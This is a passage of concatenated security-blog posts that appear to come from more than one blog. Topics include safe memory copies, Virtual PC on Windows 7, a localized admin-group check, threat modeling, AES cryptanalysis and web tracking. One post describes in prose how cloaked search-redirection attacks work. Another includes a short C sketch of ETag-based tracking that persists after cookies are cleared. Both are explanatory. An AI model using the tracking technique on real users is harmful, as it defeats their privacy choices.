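    size_t dst_size,
    _In_reads_bytes_(len) const void *src,
    size_t len)
{
    /* memcpy(dst, src, len);  <- the banned form: nothing ties len to dst_size */
    return memcpy_s(dst, dst_size, src, len);   /* fails (non-zero) instead of overflowing */
}

The extra bounds check is where the perf cost comes from, but for most copies it's small compared to the copy itself.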
Anyways, during the discussion Michael Howard said something that had me falling off my chair laughing. And I just had to share it with everyone, because I think it would make a great t-shirt in the midst of this debate:
Oh, I'm thinking of banning zero's next - so we can no longer have DIV/0 bugs! Waddya think?
OK... so it's a Friday and that is funny to only a few of us. Still great fun though.
Have a great long weekend! (For you Canadian folks that is)
OK, so anyone who knows me expects that I stay up on the bleeding edge when it comes to dev tools and operating systems. Yes, I have been using Windows 7 for almost a year now and have been loving it. However, I never ran it on my production dev environment, as I did not want to disrupt our software development workflow until Windows 7 was in final release. With it out to RTM now, I felt it was as good a time as any to migrate, especially since we recently released the latest build of our own product and have a bit of time to do this.
So last week I deployed Windows 7 to both of my production dev systems, as well as the primary QA lab workstations. It was the worst thing I could ever have done, halting all major development and test authoring in our office due to a MAJOR gotcha Microsoft failed to let us know about during the beta and RC.
Ready for this....
You cannot run Virtual PC 7 (beta) in Windows 7 WITHOUT hardware virtualization. OK, I can live with that, since the new XP Mode (which is an excellent feature) may very well need it. That didn't concern me. It was my fallback that failed to work that blew my mind...
You cannot run Virtual PC 2007 in Windows 7, as there is a hard block preventing it from being installed on Windows 7 due to compatibility issues. So the same machine that I have been using for development on Vista for a few years has now become a glorified browsing brick. I cannot do any of my kernel-mode and system-level development or debugging, as I am not ALLOWED to install Virtual PC 2007 on the same hardware that worked before. *sigh*
What surprised me is that Ben, the Virtual PC Guy at Microsoft, blogged that it was possible to run Virtual PC on Windows 7, and in his own words:
While all the integration aspects of Virtual Machine Additions work (mouse integration, shared folders, etc...) there is no performance tuning for Windows 7 at this stage - so for best performance you should use a system with hardware virtualization support.
That sounds to me like it will still work without hardware virtualization. Seems that is not the case.
Since Windows 7 is already at RTM, if this is a block in Windows itself, it isn't going to be fixed anytime soon. So hopefully they can do something on the Virtual PC side of the equation, or they are going to disappoint a lot of unknowing developers.
This just became a MAJOR blocking issue for many dev shops that are using Virtual PC for isolated testing.
If this concerns you, then I recommend you download Intel's Processor Identification Utility so you can check to see if your dev environment is capable of running hardware virtualization.
Failing to do so might get you stuck like I am, deciding whether to downgrade back to Windows Vista just to get work done. There goes another day to prep my main systems again. *sigh*
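If you'd rather check programmatically than run the utility, here's a rough sketch of the same test; it queries CPUID leaf 1 and looks at bit 5 of ECX, which reports VMX (Intel VT-x) support. Keep in mind the BIOS can still have VT disabled even when the CPU reports it:

#include <stdio.h>
#if defined(_MSC_VER)
#include <intrin.h>
#elif defined(__GNUC__)
#include <cpuid.h>
#endif

int main(void)
{
    unsigned int eax = 0, ebx = 0, ecx = 0, edx = 0;
#if defined(_MSC_VER)
    int regs[4];
    __cpuid(regs, 1);                     /* CPUID leaf 1: feature flags */
    ecx = (unsigned int)regs[2];
#elif defined(__GNUC__)
    __get_cpuid(1, &eax, &ebx, &ecx, &edx);
#endif
    /* CPUID.01H:ECX bit 5 = VMX, the Intel hardware virtualization feature. */
    printf("CPU reports VT-x (VMX): %s\n", (ecx & (1u << 5)) ? "yes" : "no");
    return 0;
}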
UPDATE: Fellow MVP Bill Grant has provided me with a solution to my dilemma. It appears that Virtual PC 7 (beta), a built-in Windows 7 component when installed, is what causes the blocking issue. By going into "Turn Windows features on or off" and removing Virtual PC support (which effectively removes XP Mode support), Virtual PC 2007 can then be installed on machines that do not have hardware virtualization support.
This isn't the most optimal behaviour, but it's acceptable. Since I can't use XP Mode without VT support in my CPU anyway, removing it does not limit Windows 7 from functioning. I have reported this odd behaviour to Microsoft since:
So if you do NOT have VT support in your CPU, please uninstall Virtual PC 7 support if you installed it. VPC 2007 will then install properly for you.
So Susan has been on my case about Twitter for some time now. In a recent round table we were recording, she "beat me up" about it, and tonight on IM we had a good discussion about the REAL vs PERCEIVED risks of Twitter.
Susan's biggest complaint is that security minded individuals shouldn't be blindly recommending the use of Twitter without educating the user on 'safe-twittering'. I would say that same logic exists for setting up web pages, blogs and the use of social networking sites like Facebook.
She stepped that up a bit tonight when she blogged about her discomfort with the fact that the RSA Conference was recommending Twitter as well.
So in an effort to stop spreading the FUD about Twitter insecurity, I wanted to share some of my thoughts through a quick set of safe twittering rules.
Look, Twitter is addictive. Simple. Short. Fast. A great way to see the thoughts of others you might care about. Ultimately though... like any other Internet based technology it has the potential to be abused... and put you at risk. No different than websites or blogs.
So be careful. Follow these rules and enjoy the conversation!
So John Bristowe, Developer Evangelist for Microsoft Canada, will be hosting a Coffee and Code event in Vancouver tomorrow from 9 to 2 at Wicked Cafe. Come join him and fellow Microsoft peers Rodney Buike and Damir Bersinic as they sit and share their knowledge over a cup of joe.
I will be there too, and will be available if anyone wants to talk about secure coding, threat modeling with the SDL TM, or integrating AuthAnvil strong authentication into your own applications or architectures.
I do hope to see some of you there. And if I don't... I will be seeing you at #energizeIT right?
What: Coffee and Code in Vancouver
When: April 8th, 2009 from 9am - 2pm
Where: Wicked Cafe - 861 Hornby Street (Vancouver)
So have you ever tried to restrict access to your applications in a way that maintains least privilege?
I do. All the time. And recently it blew up in my face, and I want to share my experience so others can learn from my failure.
Let me show you a faulty line of code:
if( principal.IsInRole( "Administrators" ) )
Seems rather harmless, doesn't it? Can you spot the defect? Come on... it's sitting right in the subject of this post.
Checking to see if the current user is in the "Administrators" group is a good idea. And using WindowsPrincipal is an appropriate way to do it. But you have to remember that not EVERYONE speaks English. In our particular case, a customer installed our product using English but had a user with a French language pack. Guess what... the above code didn't work for them. Why? Because the local administrators group on that system is actually called "Administrateurs".
The fix is rather trivial:
// SecurityIdentifier and WellKnownSidType come from System.Security.Principal
SecurityIdentifier sid = new SecurityIdentifier( WellKnownSidType.BuiltinAdministratorsSid, null );
if (principal.IsInRole(sid))
By using the well-known SID for the Administrators group, we ensure the check works regardless of the localized group name or the language in use.
Lesson learned the hard way for me. We now have an entirely new class of defect we are auditing for, which we have found in several places in our code. It always fails securely, NOT letting the user do anything, but that's not the point. It is still a defect. Other accounts we weren't considering were "Network Service" (it's an ugly name on a German target) and "Guest", just to name a few.
Hope you can learn from my mistake on that one. That's a silly but common error you may or may not be considering in your own code.
I have had the pleasure over the past few months to spend some time playing with an early rendition of "Elevation of Privilege: The Threat Modeling Game". According to Adam, "Elevation of Privilege is the easiest way to get started threat modeling". I couldn't agree more. If you have a team that is new to the whole process of threat modeling, you will want to check it out. If you are at RSA this week, drop by the Microsoft booth and pick the game up for free. If you aren't, you can download it here.
EoP is a card game for 3-6 players. The deck contains 74 playing cards in 6 suits: one suit for each of the STRIDE threats (Spoofing, Tampering, Repudiation, Information disclosure, Denial of Service and Elevation of Privilege). Each card has a more specific threat on it. You can see a short video on how to play, and find more information about the game, by checking out Adam's post here. In the end, it is a game that makes it possible to have more fun when thinking about threats. And that's a good thing.
Even more impressive is that they have released the game under a Creative Commons Attribution license, which gives you the freedom to share, adapt and remix the game. So if you feel you can improve upon it, step up and let everyone know!!
Congratulations to the SDL team at Microsoft for creating an innovative way to approach the concept of threat modeling.
It's almost time for a deluge of "Ten Years After 9/11" essays. Here's Steven Pinker:
The discrepancy between the panic generated by terrorism and the deaths generated by terrorism is no accident. Panic is the whole point of terrorism, as the root of the word makes clear: "Terror" refers to a psychological state, not an enemy or an event. The effects of terrorism depend completely on the psychology of the audience. [...]
Cognitive psychologists such as Amos Tversky, Daniel Kahneman, Gerd Gigerenzer, and Paul Slovic have shown that the perceived danger of a risk depends on two factors: fathomability and dread. People are terrified of risks that are novel, undetectable, delayed in their effects, and poorly understood. And they are terrified about worst-case scenarios, the ones that are uncontrollable, catastrophic, involuntary, and inequitable (that is, the people exposed to the risk are not the ones who benefit from it).
These psychologists suggest that cognitive illusions are a legacy of ancient brain circuitry that evolved to protect us against natural risks such as predators, poisons, storms, and especially enemies. Large-scale terrorist plots are novel, undetectable, catastrophic, and inequitable, and thus maximize both unfathomability and dread. They give the terrorists a large psychological payoff for a small investment in damage.
[...]
Audrey Cronin nicely captures the conflicting moral psychology that defines the arc of terrorist movements: "Violence has an international language, but so does decency."
Nice essay by Christopher Soghoian on why cell phone and Internet providers need to enable security options by default.
Really interesting research.
Search-redirection attacks combine several well-worn tactics from black-hat SEO and web security. First, an attacker identifies high-visibility websites (e.g., at universities) that are vulnerable to code-injection attacks. The attacker injects code onto the server that intercepts all incoming HTTP requests to the compromised page and responds differently based on the type of request:
- Requests from search-engine crawlers return a mix of the original content, along with links to websites promoted by the attacker and text that makes the website appealing to drug-related queries.
- Requests from users arriving from search engines are checked for drug terms in the original search query. If a drug name is found in the search term, then the compromised server redirects the user to a pharmacy or another intermediary, which then redirects the user to a pharmacy.
- All other requests, including typing the link directly into a browser, return the infected website's original content.
- The net effect is that web users are seamlessly delivered to illicit pharmacies via infected web servers, and the compromise is kept hidden from view of the affected host's webmaster in nearly all circumstances.
Upon inspecting search results, we identified 7,000 websites that had been compromised in this manner between April 2010 and February 2011. One quarter of the top ten search results were observed to actively redirect to pharmacies, and another 15% of the top results were for sites that no longer redirected but had previously been compromised. We also found that legitimate health resources, including authorized pharmacies, were largely crowded out of the top results by search-redirection attacks and blog and forum spam promoting fake pharmacies.
And the paper.
A couple of weeks ago Wired reported the discovery of a new, undeletable web cookie:
Researchers at U.C. Berkeley have discovered that some of the net’s most popular sites are using a tracking service that can’t be evaded -- even when users block cookies, turn off storage in Flash, or use browsers’ “incognito” functions.
The Wired article was very short on specifics, so I waited until one of the researchers -- Ashkan Soltani -- wrote up more details. He finally did, in a quite technical essay:
What differentiates KISSmetrics apart from Hulu with regards to respawning is, in addition to Flash and HTML5 LocalStorage, KISSmetrics was exploiting the browser cache to store persistent identifiers via stored Javascript and ETags. ETags are tokens presented by a user’s browser to a remote webserver in order to determine whether a given resource (such as an image) has changed since the last time it was fetched. Rather than simply using it for version control, we found KISSmetrics returning ETag values that reliably matched the unique values in their 'km_ai' user cookies.
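To make the trick concrete, here's a hypothetical sketch (my illustration, not KISSmetrics' actual code) of how a server turns the ETag into a persistent identifier:

#include <stdio.h>

/* The server hands out a unique token as the ETag for some resource. On every later
   request the browser echoes that token back in the If-None-Match header, so the
   server re-identifies the visitor even if cookies are blocked or cleared. */
void etag_for_request(const char *if_none_match,   /* If-None-Match header, or NULL */
                      const char *fresh_id,        /* newly minted unique token */
                      char *etag_out, size_t out_len)
{
    if (if_none_match && *if_none_match)
        snprintf(etag_out, out_len, "%s", if_none_match);  /* returning visitor: our old token comes back */
    else
        snprintf(etag_out, out_len, "%s", fresh_id);       /* first visit: plant a fresh identifier */
}

A respawning script then only needs to copy that echoed value back into cookies and other storage, which is consistent with the matching 'km_ai' values the researchers observed.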
"Biclique Cryptanalysis of the Full AES," by Andrey Bogdanov, Dmitry Khovratovich, and Christian Rechberger.
Abstract. Since Rijndael was chosen as the Advanced Encryption Standard, improving upon 7-round attacks on the 128-bit key variant or upon 8-round attacks on the 192/256-bit key variants has been one of the most difficult challenges in the cryptanalysis of block ciphers for more than a decade. In this paper we present a novel technique of block cipher cryptanalysis with bicliques, which leads to the following results:
- The first key recovery attack on the full AES-128 with computational complexity 2^126.1.
- The first key recovery attack on the full AES-192 with computational complexity 2^189.7.
- The first key recovery attack on the full AES-256 with computational complexity 2^254.4.
- Attacks with lower complexity on the reduced-round versions of AES not considered before, including an attack on 8-round AES-128 with complexity 2^124.9.
- Preimage attacks on compression functions based on the full AES versions.
In contrast to most shortcut attacks on AES variants, we do not need to assume related-keys. Most of our attacks only need a very small part of the codebook and have small memory requirements, and are practically verified to a large extent. As our attacks are of high computational complexity, they do not threaten the practical use of AES in any way.
This is what I wrote about AES in 2009. I still agree with my advice:
Cryptography is all about safety margins. If you can break n rounds of a cipher, you design it with 2n or 3n rounds. What we're learning is that the safety margin of AES is much less than previously believed. And while there is no reason to scrap AES in favor of another algorithm, NIST should increase the number of rounds of all three AES variants. At this point, I suggest AES-128 at 16 rounds, AES-192 at 20 rounds, and AES-256 at 28 rounds. Or maybe even more; we don't want to be revising the standard again and again.

And for new applications I suggest that people don't use AES-256. AES-128 provides more than enough security margin for the foreseeable future. But if you're already using AES-256, there's no reason to change.
The advice about AES-256 was because of a 2009 attack, not this result.
Again, I repeat the saying I've heard came from inside the NSA: "Attacks always get better; they never get worse."
A prison in Brazil uses geese as part of its alarm system.
There's a long tradition of this. Circa 400 BC, alarm geese alerted a Roman citadel to a Gaul attack.